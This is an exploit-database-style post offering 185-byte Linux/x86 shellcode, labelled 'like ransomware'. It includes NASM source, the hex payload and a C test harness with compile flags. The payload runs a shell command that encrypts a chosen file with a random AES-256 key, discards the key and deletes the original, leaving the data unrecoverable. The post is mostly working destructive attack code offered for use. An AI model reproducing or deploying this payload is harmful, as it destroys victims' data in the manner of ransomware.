Linux/x86 OpenSSL File Encryption Shellcode

185 bytes small Linux/x86 OpenSSL encrypt files with aes256cbc shellcode.

MD5 | bef6affa3c323e2d2f81f0589e99abc5

# Exploit Title: Linux/x86 openssl aes256cbc encrypt files small like ransomware (185 bytes)
# Google Dork: None
# Date: 02.05.2019
# Exploit Author: strider
# Vendor Homepage: None
# Software Link: None
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
# CVE : None
# Shellcode Length: 185

This shellcode encrypts the specified file aith aes256cbc and a 32byte random key.
After encryption the key is dropped.

replace test.txt and .test.txt with any file.

-----------------------------[Shellcode Dump]---------------------------------
section .text

global _start

xor eax, eax
push eax
jmp short _cmd

pop ecx
mov edi, ecx
xor ecx, ecx
push eax
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
push eax
push word 0x632d
mov esi, esp
push eax
push edi
push esi
push ebx
mov ecx, esp
mov al, 11
int 0x80

call _exec
;replace test.txt with any file
msg db "mv test.txt .test.txt && head -c 32 /dev/urandom | base64 | openssl aes-256-cbc -e -in .test.txt -out test.txt -pbkdf2 -k - && rm .test.txt", 0x0a

gcc -m32 -fno-stack-protector -z execstack -o tester tester.c


#include <stdio.h>
#include <string.h>

unsigned char shellcode[] = "\x31\xc0\x50\xeb\x23\x59\x89\xcf\x31\xc9\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe6\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xd8\xff\xff\xff\x6d\x76\x20\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x2e\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x26\x26\x20\x68\x65\x61\x64\x20\x2d\x63\x20\x33\x32\x20\x2f\x64\x65\x76\x2f\x75\x72\x61\x6e\x64\x6f\x6d\x20\x7c\x20\x62\x61\x73\x65\x36\x34\x20\x7c\x20\x6f\x70\x65\x6e\x73\x73\x6c\x20\x61\x65\x73\x2d\x32\x35\x36\x2d\x63\x62\x63\x20\x2d\x65\x20\x2d\x69\x6e\x20\x2e\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x2d\x6f\x75\x74\x20\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x2d\x70\x62\x6b\x64\x66\x32\x20\x2d\x6b\x20\x2d\x20\x26\x26\x20\x72\x6d\x20\x2e\x74\x65\x73\x74\x2e\x74\x78\x74\x0a";
void main()
printf("Shellcode Length: %d\n", strlen(shellcode));

int (*ret)() = (int(*)())shellcode;

Related Posts